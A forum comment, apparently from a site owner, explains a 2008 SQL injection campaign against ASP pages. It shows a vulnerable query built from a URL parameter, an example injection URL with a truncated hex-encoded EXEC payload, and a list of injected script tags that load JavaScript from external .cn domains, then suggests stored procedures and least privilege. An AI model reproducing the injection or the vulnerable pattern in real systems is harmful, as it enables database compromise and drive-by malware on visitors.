Denying POST will not completely help. SQL injection can also be done using GET request as well.
Complete fix is to convert all the query constructions script to stored_procs instead of doing it inside ASP pages. Stored procs needs only execute permissions to run. Deny write access to all tables. This will be costly sometimes, as many of web applications not designed this way.
My sites also had SQL injections since April 08. I’ve investigated it. Here how it works.
For example...
You have a ASP file customer_lookup.asp with following script in it..
SELECT * FROM customer_table WHERE cust_email=' & RequestQueryString("email") & ''"
Where you are constructing the SQL script by appending part of the URL query string value EMAIL.
Page will be typically called as http://www.mydomain.com/customer_lookup.asp?email="
[email protected]"
Now Attacker can call the same page this way...
"http://www.mydomain.com/
[email protected];DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415....) AS VARCHAR(4000));EXEC(@S);"
Now the actual script inside the Customer_lookup.asp will be
"SELECT * from customer_table WHERE
[email protected];DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415....) AS VARCHAR(4000));EXEC(@S);"
As you can see semicolon (";") is a separator for SQL commands. So page will execute injected SQL commands.
If the db user account you use with IIS has full writes on database then script can drop tables/Query tables & delete/modify other database objects.
Here are some of the injections to my tables… As you can see all are from “.cn†domain (Chinese).
<script src=http://www.heihei117.cn/k.js>
<script src=http://www.wowgm1.cn/m.js></script>
<script src=http://www.killwow1.cn/g.js></script>
<script src=http://www.caocaowow.cn/ip.js></script>
<script src=http://www.kisswow.com.cn/m.js></script>
<script src=http://www.wowyeye.cn/m.js></script>
<script src=http://www.heihei117.cn.js></script>
Another way to solve this problem is that JODOHOST can block all TCP requests coming from CHINESE country at the firewall.